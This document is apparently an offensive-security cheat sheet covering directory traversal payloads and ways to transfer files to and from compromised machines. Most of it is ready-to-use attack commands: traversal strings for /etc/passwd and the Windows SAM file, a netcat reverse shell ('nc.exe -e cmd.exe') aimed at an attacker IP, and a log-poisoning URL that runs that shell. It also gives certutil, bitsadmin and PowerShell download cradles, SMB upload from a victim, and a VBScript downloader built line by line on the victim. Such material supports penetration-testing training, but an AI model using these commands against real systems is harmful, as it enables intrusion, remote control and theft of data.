# File transfer ## Directory traversal ### What is it? Directory Traversal, also known as Path Traversal, is a vulnerability that allows an attacker to read files on the victim’s system by manipulating file paths used in the application. **A simple example:** A vulnerable web application may have the endpoint /get\_file?path={filepath} When a request is made, the application returns the content of the specified file. If an attacker inserts a path into {filepath} such as ../../../etc/passwd, they might get access to the system files. The application then fetches this file, and if the file contents are sent in the response, the attacker can view sensitive system information. Remember that a payload or attack may change depending on the application and the server's file system. Directory Traversal can often lead to: * Sensitive data exposure * System information disclosure **Other learning resources:** PortSwigger: ### Checklist * [ ] What is the technology stack you're attacking? * [ ] What application/framework is being used? * [ ] Is it PHP, Java, Python, .NET, etc? * [ ] Verify injection points * [ ] URL parameters * [ ] Form fields * [ ] HTTP headers (e.g. cookies, etc) * [ ] Check if you can traverse to directories outside of the webroot: * [ ] ../../../../etc/passwd * [ ] ../../../../Windows/System32/config/SAM (Windows) * [ ] Is there a blocklist? * [ ] Is there a filter? * [ ] Is the filter recursive? * [ ] Is the filter on single characters or sets? (e.g. / vs ../) * [ ] Can you bypass the blocklist? * [ ] Is a specific extension required? * [ ] Can you read a sensitive file with allowed extensions? * [ ] Can you bypass with: * [ ] Null byte? %00 * [ ] Encoding * [ ] Double encoding * [ ] URL encoding * [ ] Unicode encoding * [ ] Test for log exposure * [ ] Can you read log files? * [ ] Other unexpected bypasses ../../ in the middle of the path ### Exploitation Basic directory traversal ``` ../../../../etc/passwd ``` Reading application's own configuration files ``` ../../webapp/config/database.ini ``` Log exposure ``` ../../../../var/log/apache2/access.log ``` Non-recursive filter bypass ``` ..././..././..././..././..././..././etc/passwd ``` ### Tools ## Web Server Install and run updog: ```bash pip3 install updog updog updog -d /another/directory updog -p 1234 updog --password examplePassword123! updog --ssl ``` Simple Python HTTP server: ```bash # Python 2 python -m SimpleHTTPServer 8080 ``` ## FTP Server Start a Twisted FTP server: ```bash twistd -n ftp -p 21 --root /path/ ``` From a victim to upload a file to your FTP server: ```bash curl -T out.txt ftp://10.10.15.229 ``` Example reverse-shell FTP script (create file then run): ```bash # Create ftp script (on victim) echo open 10.11.1.111 > ftp.txt) echo USER anonymous >> ftp.txt echo ftp >> ftp.txt echo bin >> ftp.txt echo GET file >> ftp.txt echo bye >> ftp.txt # Execute ftp -v -n -s:ftp.txt ``` ## TFTP Server On Kali: ```bash atftpd --daemon --port 69 /tftp ``` From a reverse-Windows shell (download netcat and execute): ``` tftp -i 10.11.1.111 GET nc.exe nc.exe -e cmd.exe 10.11.1.111 4444 ``` Example vulnerable URL (shows using null byte to include logs and run nc.exe): ``` http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=nc.exe%20-e%20cmd.exe%2010.11.0.105%204444 ``` ## Windows — File Transfer Methods Bitsadmin: ```powershell bitsadmin /transfer mydownloadjob /download /priority normal http:///xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe ``` Certutil: ```powershell certutil.exe -urlcache -split -f "http://10.11.1.111/Powerless.bat" Powerless.bat ``` Powershell: ```powershell (New-Object System.Net.WebClient).DownloadFile("http://10.11.1.111/CLSID.list","C:\Users\Public\CLSID.list") invoke-webrequest -Uri http://10.10.14.19:9090/PowerUp.ps1 -OutFile powerup.ps1 ``` FTP (from a reverse shell — see FTP Server section above for full FTP script) ## SMB Server Run an SMB share using Impacket's smbserver: ```bash # Python 2 impacket example path (older distributions) python /usr/share/doc/python-impacket/examples/smbserver.py Lab "/root/labs/public/10.11.1.111" -u usuario -p pass # Python 3 impacket example path python /usr/share/doc/python3-impacket/examples/smbserver.py Lab "/root/htb/169-resolute/smb" ``` Or configure Samba by editing /etc/samba/smb.conf (example configuration): ```shellscript [global] workgroup = WORKGROUP server string = Samba Server %v netbios name = indishell-lab security = user map to guest = bad user name resolve order = bcast host dns proxy = no bind interfaces only = yes [ica] path = /var/www/html/pub writable = no guest ok = yes guest only = yes read only = yes directory mode = 0555 force user = nobody ``` Set permissions and restart Samba: ```bash chmod -R 777 smb_path chown -R nobody:nobody smb_path service smbd restart ``` From a victim machine with a reverse shell: * Download from SMB share: ``` copy \\10.11.1.111\Lab\wce.exe . ``` * Upload to SMB share: ``` copy wtf.jpg \\10.11.1.111\Lab ``` ## VBScript downloader (create on the victim) Create wget.vbs via echoed lines and execute: ```shellscript # Create wget.vbs (on victim) echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET",strURL,False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs # Execute cscript wget.vbs http://10.11.1.111/file.exe file.exe ```